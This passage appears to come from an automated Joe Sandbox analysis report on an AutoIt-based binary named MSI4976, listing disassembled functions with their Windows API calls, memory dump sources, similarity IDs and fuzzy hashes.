                                        • Opcode Fuzzy Hash: 3954ffb072e9391a558d0ac30298837edaacebe9715bd13432a72223165cdeb7
                                        • Instruction Fuzzy Hash: 54F0A0B1240304BBEA276E81EC46FE67B1DEB05BA6F104015FB051E1F0DAF26C009760
                                        Function 0035D5CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0035D0D4: SendMessageW.USER32(?,0000110A,00000000,00000000), ref: 0035D0ED
                                          • Part of subcall function 0035D0D4: SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0035D127
                                        • SendMessageW.USER32(?,0000110B,00000005,00000000), ref: 0035D5F2
                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0035D602
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: @U=u
                                        • API String ID: 3850602802-2594219639
                                        • Opcode ID: 6ca9608a7530a62a9b58867cde77e12bd7b49028cb827097e5bc1a63e4ff5e1f
                                        • Instruction ID: fb7896102cbc1725bdd55ffd7052adb617960ae4782f2b0791a9874b9f2546d8
                                        • Opcode Fuzzy Hash: 6ca9608a7530a62a9b58867cde77e12bd7b49028cb827097e5bc1a63e4ff5e1f
                                        • Instruction Fuzzy Hash: 86E0D8752083057FF6271A61AC4BE977B1CDB49716F114025FB00461B0EEA38C145524
                                        Function 0036804C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ClassName_wcscmp
                                        • String ID: #32770
                                        • API String ID: 2292705959-463685578
                                        • Opcode ID: 7ad82c35009b76571b23d31ddbb8f518b46239e03639fd78aa5ee5569b38e47c
                                        • Instruction ID: 7dda131a7fcb228df51b9404e41a105d19b430474258ba8d7c4b3e2a25ab49f3
                                        • Opcode Fuzzy Hash: 7ad82c35009b76571b23d31ddbb8f518b46239e03639fd78aa5ee5569b38e47c
                                        • Instruction Fuzzy Hash: 5AE0D83360022927D722EBA6AC4AED7FBACEB51764F000126F914E7181D6B0EA4587D0
                                        Function 0034DA03 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __umatherr.LIBCMT ref: 0034DA2A
                                          • Part of subcall function 0034DD86: __ctrlfp.LIBCMT ref: 0034DDE5
                                        • __ctrlfp.LIBCMT ref: 0034DA47
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: __ctrlfp$__umatherr
                                        • String ID: xn9
                                        • API String ID: 219961500-30944987
                                        • Opcode ID: 85d09d59ceaf79cccec7b47b43fcecb30600b4e5cbee1471dcf2a70782593f99
                                        • Instruction ID: c27a303e60ab6feb932046594151af27b0338c6f70bd1433fcfcc15d9dd510ba
                                        • Opcode Fuzzy Hash: 85d09d59ceaf79cccec7b47b43fcecb30600b4e5cbee1471dcf2a70782593f99
                                        • Instruction Fuzzy Hash: 7BE06D7140860AEADB027F80F9066AA7BE5EF05310F804495F99C1C1A6DFB294B49757
                                        Function 0035B35D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0035B36B
                                          • Part of subcall function 00342011: _doexit.LIBCMT ref: 0034201B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Message_doexit
                                        • String ID: AutoIt$Error allocating memory.
                                        • API String ID: 1993061046-4017498283
                                        • Opcode ID: e1187d80f671c3d5ffa6ea0e07451fc50c0d65e3052ce1ed4a460bbb29a847ea
                                        • Instruction ID: ac7832d2a7df876b30d7dab685938a59313e96f9e1bca2180ca1cf2f8978fcb1
                                        • Opcode Fuzzy Hash: e1187d80f671c3d5ffa6ea0e07451fc50c0d65e3052ce1ed4a460bbb29a847ea
                                        • Instruction Fuzzy Hash: 16D05B3238431833D21B36987C47FD5B6CC8F05B51F150416FF487E5D28AE2A4D041D9
                                        Function 0039BC74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(?), ref: 0039BAB8
                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0039BCAB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: DirectoryFreeLibrarySystem
                                        • String ID: WIN_XPe
                                        • API String ID: 510247158-3257408948
                                        • Opcode ID: 371e1d3534539561026c61822d03f221cb74da134f4f29b041e633fef7bec886
                                        • Instruction ID: 9748b11b4a218374fadb1fdcc9de074576978d9ce3a662cc54930d5de968a8cf
                                        • Opcode Fuzzy Hash: 371e1d3534539561026c61822d03f221cb74da134f4f29b041e633fef7bec886
                                        • Instruction Fuzzy Hash: 78E0A570C1415EAFCB56DBA8D985AEDB7BCBB08300F148486E022A6450C7755A45DF21
                                        Function 00388495 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0038849F
                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 003884B2
                                          • Part of subcall function 00368355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003683CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        • Opcode ID: e76190776f1aebfa588a27c89cdb8eeb55decd7e986cd5601cb11c8b9db71930
                                        • Instruction ID: 03409377b0e4572ddf61d65c82f77c7d5ca38bfa661513ac4a7c690653ab93f7
                                        • Opcode Fuzzy Hash: e76190776f1aebfa588a27c89cdb8eeb55decd7e986cd5601cb11c8b9db71930
                                        • Instruction Fuzzy Hash: 01D01276384314B7E76BA770AC4FFD76A58EF19B11F140929B34AAA2D0C9E0B800C761
                                        Function 003884C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 003884DF
                                        • PostMessageW.USER32(00000000), ref: 003884E6
                                          • Part of subcall function 00368355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003683CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        • Opcode ID: caf1e23e1345904c8c457373fd3fb9690edab5a1266c57d944cd8849544686cb
                                        • Instruction ID: 97877f297864c4bde103a1907fd3c29170a2142d2e5377b64bcf64bb96fc345c
                                        • Opcode Fuzzy Hash: caf1e23e1345904c8c457373fd3fb9690edab5a1266c57d944cd8849544686cb
                                        • Instruction Fuzzy Hash: 2AD012763853147BE76BA770AC4FFD76658EB1AB11F140929B34AAA2D0C9E0B800C765
                                        Function 0036D009 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTempPathW.KERNEL32(00000104,?), ref: 0036D01E
                                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 0036D035
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Temp$FileNamePath
                                        • String ID: aut
                                        • API String ID: 3285503233-3010740371
                                        • Opcode ID: a1ad722ad264a83a4a2e3b620dcdfa460549dceea96e6c5ef2c4da8c0e81bc58
                                        • Instruction ID: 0dace1b91cb6e1ddaa22757283eb37d54b89923c677c5d62dd1bdc517a30c21c
                                        • Opcode Fuzzy Hash: a1ad722ad264a83a4a2e3b620dcdfa460549dceea96e6c5ef2c4da8c0e81bc58
                                        • Instruction Fuzzy Hash: E2D05EB154030EBBDB11ABA0ED0EF99776CA700705F104191B615D14D1D3B0D645CBA1
                                        Function 0035CB3F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 0035CB4B
                                        • SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 0035CB59
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: @U=u
                                        • API String ID: 3850602802-2594219639
                                        • Opcode ID: c77cb753e6c1e05099545962fa770cf5c3b58af8a8ed432256851876a17a5610
                                        • Instruction ID: e63532e7e3fece57c1df3ce50f45328127d9777668bfa9da55892d0fcd774c44
                                        • Opcode Fuzzy Hash: c77cb753e6c1e05099545962fa770cf5c3b58af8a8ed432256851876a17a5610
                                        • Instruction Fuzzy Hash: D2C04C711405C0BAE7361F67BC0DD473E3DE7CBF51B51425CF216964B686790055D634